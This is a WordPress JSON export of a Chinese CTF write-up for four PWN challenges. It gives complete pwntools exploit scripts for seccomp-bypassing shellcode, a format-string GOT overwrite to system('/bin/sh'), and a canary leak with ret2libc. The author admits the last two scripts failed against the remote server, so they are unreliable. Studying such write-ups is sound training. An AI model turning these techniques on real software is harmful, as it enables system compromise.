{"id":483,"date":"2024-12-15T22:41:25","date_gmt":"2024-12-15T14:41:25","guid":{"rendered":"http:\/\/8.141.27.105\/?p=483"},"modified":"2024-12-15T22:41:25","modified_gmt":"2024-12-15T14:41:25","slug":"%e7%ac%ac%e4%ba%8c%e5%b1%8acn-fnstctf-pwn%e9%83%a8%e5%88%86wp","status":"publish","type":"post","link":"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/15\/%e7%ac%ac%e4%ba%8c%e5%b1%8acn-fnstctf-pwn%e9%83%a8%e5%88%86wp\/","title":{"rendered":"\u7b2c\u4e8c\u5c4aCN-fnst::CTF PWN\u90e8\u5206WP"},"content":{"rendered":"\n<p>\u56db\u9053\u9898\uff0c\u5176\u4e2d\u540e\u4e24\u9053exp\u611f\u89c9\u6ca1\u4ec0\u4e48\u6bdb\u75c5\uff0c\u4f46\u662f\u6253\u4e0d\u901a\uff0c\u770b\u4e86\u5b98\u65b9wp\u611f\u89c9\u601d\u8def\u4e5f\u5dee\u4e0d\u591a\uff0c\u4e5f\u4e00\u8d77\u5199\u8fd9\u4e86\u3002<\/p>\n\n\n\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #f4f4f4;color:#f4f4f4\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #f4f4f4;color:#f4f4f4\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/15\/%e7%ac%ac%e4%ba%8c%e5%b1%8acn-fnstctf-pwn%e9%83%a8%e5%88%86wp\/#real_signin\" title=\"real_signin\">real_signin<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/15\/%e7%ac%ac%e4%ba%8c%e5%b1%8acn-fnstctf-pwn%e9%83%a8%e5%88%86wp\/#sandbox\" title=\"sandbox\">sandbox<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/15\/%e7%ac%ac%e4%ba%8c%e5%b1%8acn-fnstctf-pwn%e9%83%a8%e5%88%86wp\/#ez_fmt\" title=\"ez_fmt\">ez_fmt<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/15\/%e7%ac%ac%e4%ba%8c%e5%b1%8acn-fnstctf-pwn%e9%83%a8%e5%88%86wp\/#signin\" title=\"signin\">signin<\/a><\/li><\/ul><\/nav><\/div>\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"real_signin\"><\/span>real_signin<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u7b7e\u5230\u9898\uff0c\u7ed5\u8fc7\u8fc7\u6ee4\u547d\u4ee4\u6267\u884c\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/HOV7Y1RV@105OA8C.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"859\" height=\"742\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/HOV7Y1RV@105OA8C.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-484\"  sizes=\"auto, (max-width: 859px) 100vw, 859px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u5b98\u65b9WP\u662fs\\h\uff0c\u6211\u7528\u7684set -s<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/K1JP095XAQWSA7_IP92Q.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"316\" height=\"180\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/K1JP095XAQWSA7_IP92Q.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-485\"  sizes=\"auto, (max-width: 316px) 100vw, 316px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"sandbox\"><\/span>sandbox<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u6267\u884cshellcode\uff0c\u6709\u6c99\u7bb1\u8fc7\u6ee4\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/XSCF1@0QBQK7J0_8.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1011\" height=\"523\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/XSCF1@0QBQK7J0_8.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-486\"  sizes=\"auto, (max-width: 1011px) 100vw, 1011px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fc7\u6ee4\u4e86execve\u3001read\u3001write\u3001open\uff0c\u4f46\u662f\u6ca1\u4e8b\uff0c\u6709openat+sendfile<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/VH4VC1JVK5N2K8XLA1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"608\" height=\"273\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/VH4VC1JVK5N2K8XLA1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-487\"  sizes=\"auto, (max-width: 608px) 100vw, 608px\" \/><\/div><\/figure>\n\n\n\n<p>payload\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>payload=asm(shellcraft.openat(-100,\"flag\")+shellcraft.sendfile(1,3,0,100)+shellcraft.exit(0))<\/code><\/pre>\n\n\n\n<p>\u4f46\u662f\u6253\u4e0d\u901a\uff0c\u7559\u610f\u5230\u8fd9\u4e00\u884c:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/R0THFMH6APQRY@B.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"909\" height=\"392\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/R0THFMH6APQRY@B.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-488\"  sizes=\"auto, (max-width: 909px) 100vw, 909px\" \/><\/div><\/figure>\n\n\n\n<p>\u8981\u6c42\u4e00\u5f00\u59cb\u8c03\u7528\u4e00\u4e2a\u8c03\u7528\u53f7\u4e3a0xffffffff\u7684\u51fd\u6570\uff0c\u4e8e\u662fpayload\u53d8\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>asm('''mov rax,0xffffffff; syscall'''+shellcraft.openat(-100,\"flag\")+shellcraft.sendfile(1,3,0,100)+shellcraft.exit(0))\n<\/code><\/pre>\n\n\n\n<p>\u5b8c\u6574exp\uff1a<\/p>\n\n\n\n<div class=\"wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-ad2f72ca wp-block-group-is-layout-flex\">\n<pre class=\"wp-block-code\"><code>\nfrom pwn import *\n\nfrom ae64 import AE64\ncontext(arch='amd64',os='linux')\ncontext.log_level = 'debug'\n#p=remote('ctf.mardle.cn',34854)\np=process('\/home\/monke\/PWN\/CNCTF\/sandbox\/sandbox')\n\np.recvuntil('shellcode: \\n')\npayload=asm('''mov rax,0xffffffff; syscall'''+shellcraft.openat(-100,\"flag\")+shellcraft.sendfile(1,3,0,100)+shellcraft.exit(0))\n\np.sendline(payload)\nprint(p.recvall())\np.interactive()\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/K2VK0S9EV3_BPJRP5C.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"643\" height=\"187\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/K2VK0S9EV3_BPJRP5C.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-491\"  sizes=\"auto, (max-width: 643px) 100vw, 643px\" \/><\/div><\/figure>\n<\/div>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/K2VK0S9EV3_BPJRP5C-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"643\" height=\"187\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/K2VK0S9EV3_BPJRP5C-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-492\"  sizes=\"auto, (max-width: 643px) 100vw, 643px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code><\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"ez_fmt\"><\/span>ez_fmt<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/17ONO4ZOMSNMX62UY37.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"940\" height=\"375\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/17ONO4ZOMSNMX62UY37.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-493\"  sizes=\"auto, (max-width: 940px) 100vw, 940px\" \/><\/div><\/figure>\n\n\n\n<p>\u5982\u4e0a\u56fe\uff0c\u9898\u76ee\u4e00\u5f00\u59cb\u4f1a\u628aread\u51fd\u6570\u5730\u5740\uff08\u771f\u5b9e\u5730\u5740\uff09\u6253\u51fa\u6765\uff0c\u7136\u540e\u6709\u4e00\u4e2aread\u4e00\u4e2aprintf\uff0c\u6ce8\u610f\u6700\u540e\u9898\u76ee\u4e0d\u662f\u6b63\u5e38return\u800c\u662fexit(0)\u3002<\/p>\n\n\n\n<p>\u601d\u8def\u662f\u5229\u7528\u9898\u76ee\u7ed9\u7684read\u51fd\u6570\u7b97\u51fasystem\u51fd\u6570\u5730\u5740\uff0c\u7136\u540e\u7b2c\u4e00\u6b21read\u5148\u8986\u5199got\u8868exit\u51fd\u6570\u4e3amain\u51fd\u6570\uff0c\u7b2c\u4e8c\u6b21\u628aprintf\u8986\u5199\u4e3asystem\uff0c\u7b2c\u4e09\u6b21\u8f93\u5165\/bin\/sh\\x00\u5c31\u4f1a\u6267\u884csystem(\/bin\/sh)\uff0c\u62ff\u5230shell\u3002<\/p>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\nfrom pwn import *\nfrom LibcSearcher import *\n\ncontext.log_level = 'debug'\n\np = process('\/home\/monke\/PWN\/CNCTF\/fmt\/ez_fmt')\n#p = remote('ctf.mardle.cn', 33992)\nelf = ELF('\/home\/monke\/PWN\/CNCTF\/fmt\/ez_fmt')\npop_rdi=0x400783 \n\np.recvuntil(\"you: \")\nread=p.recv(14)\nprint(read)\nread=int(read,16)\n#print(hex(elf.got&#91;\"read\"]))\n#print(elf.sym&#91;\"main\"])\n\n\nlibc=LibcSearcher(\"read\",read)\nlibcbase=read-libc.dump('read')\nsystem=libcbase+libc.dump('system')\n\n\n\npayload=fmtstr_payload(8,{elf.got&#91;\"exit\"] :elf.sym&#91;\"main\"]})\np.sendlineafter(\"ng: \\n\",payload)\n#test\n#payload=b\"%9$sAAAA\" + p64(elf.got&#91;\"puts\"])\n#p.sendlineafter(\"ng: \\n\",payload)\n#puts = u64(p.recvuntil('\\x7f')&#91;-6:].ljust(8,b'\\x00'))\n#print(hex(puts))\npayload=fmtstr_payload(8,{elf.got&#91;\"printf\"] :elf.sym&#91;\"system\"]})\np.sendlineafter(\"ng: \\n\",payload)\np.sendline(\"\/bin\/sh\\x00\")\n\np.interactive()\n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"signin\"><\/span>signin<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/CYBPRV5BINA71YKEQ7VU.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"851\" height=\"487\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/CYBPRV5BINA71YKEQ7VU.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-494\"  sizes=\"auto, (max-width: 851px) 100vw, 851px\" \/><\/div><\/figure>\n\n\n\n<p>\u7b2c\u4e00\u4e2aread+puts\u6cc4\u9732canary\uff0c\u7136\u540e\u6253ret2libc\uff0c\u503c\u5f97\u4e00\u63d0\u7684\u662f\uff0c\u5728\u9ad8\u7248\u672clibc\u4e2d\u51fd\u6570\u4e0d\u518d\u56fa\u5b9a\u4ee5\\x7f\u7ed3\u5c3e\uff0c\u6240\u4ee5\u6cc4\u9732puts\u5730\u5740\u65f6\u5019\u6700\u597d\u522b\u7528 puts = u64(p.recvuntil(&#8216;\\x7f&#8217;)[-6:].ljust(8,b&#8217;\\x00&#8242;)), \u7528puts =u64(p.recv(7).ljust(8, b&#8221;\\0&#8243;))<\/p>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import*\nfrom LibcSearcher import *\ncontext(arch=\"amd64\", os=\"linux\", log_level=\"debug\")\n\n# Load the ELF file and execute it as a new process.\n\n#lddp=remote(\"ctf.mardle.cn\",34887)\np = process(\"\/home\/monke\/PWN\/CNCTF\/signin\/signin\")\nelf=ELF(\"\/home\/monke\/PWN\/CNCTF\/signin\/signin\")\n\npop_rdi = 0x40071e\nret=0x400596\n\n#gdb.attach(p)\n#\u5229\u7528printf\u6ca1\u8bfb\u5230\\0\u4e0d\u622a\u65ad\u7684\u7279\u70b9\uff0c\u6cc4\u9732canary\np.sendlineafter(\" name: \",b'a')\n\npayload1=b'a'*23+b'b'\np.sendlineafter('yourself: ',payload1)\n\np.recvuntil(b'b')\ncanary=u64(p.recv(8))-0xa\n\n#leak\npayload = cyclic(24)+p64(canary)+p64(0)+p64(ret)+p64(pop_rdi)+p64(elf.got&#91;\"puts\"])+p64(elf.plt&#91;\"puts\"])+p64(elf.sym&#91;\"main\"])\n\np.sendlineafter('Say something: ',payload)\n#puts = u64(p.recvuntil('\\x7f')&#91;-6:].ljust(8,b'\\x00'))\nputs =u64(p.recv(7).ljust(8, b\"\\0\"))\nprint('puts='+hex(puts))\n\n\nlibc=LibcSearcher(\"puts\",puts)\nlibcbase=puts-libc.dump('puts')\nsystem=libcbase+libc.dump('system')\nbinsh=libcbase+libc.dump('str_bin_sh')\nprint(hex(system))\nprint(hex(binsh))\n\nprint(hex(canary))\n\npayload = cyclic(24)+p64(canary)+p64(0)+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)\n\n\np.sendlineafter(\" name: \",b'a')\np.sendlineafter('yourself: ',b'a')\np.sendlineafter('Say something: ',payload)\n#gdb.attach(p)\np.interactive()\n<\/code><\/pre>\n\n\n\n<p>\u540e\u4e24\u9898\u6253\u4e0d\u901a\uff0c\u770b\u4e86\u5b98\u65b9wp\u611f\u89c9\u4e5f\u6ca1\u4ec0\u4e48\u4e0d\u5bf9\u52b2\u7684\uff0c\u5982\u679c\u53d1\u73b0\u9519\u8bef\u4e4b\u5904\u52b3\u8bf7\u5e08\u5085\u4eec\u5728\u8bc4\u8bba\u533a\u6307\u6b63\uff0c\u611f\u6fc0\u4e0d\u5c3d\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u56db\u9053\u9898\uff0c\u5176\u4e2d\u540e\u4e24\u9053exp\u611f\u89c9\u6ca1\u4ec0\u4e48\u6bdb\u75c5\uff0c\u4f46\u662f\u6253\u4e0d\u901a\uff0c\u770b\u4e86\u5b98\u65b9wp\u611f\u89c9\u601d\u8def\u4e5f\u5dee\u4e0d\u591a\uff0c\u4e5f\u4e00\u8d77\u5199\u8fd9\u4e86\u3002 real_s [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-483","post","type-post","status-publish","format-standard","hentry","category-game"],"_links":{"self":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/483","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/comments?post=483"}],"version-history":[{"count":3,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/483\/revisions"}],"predecessor-version":[{"id":495,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/483\/revisions\/495"}],"wp:attachment":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/media?parent=483"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/categories?post=483"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/tags?post=483"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}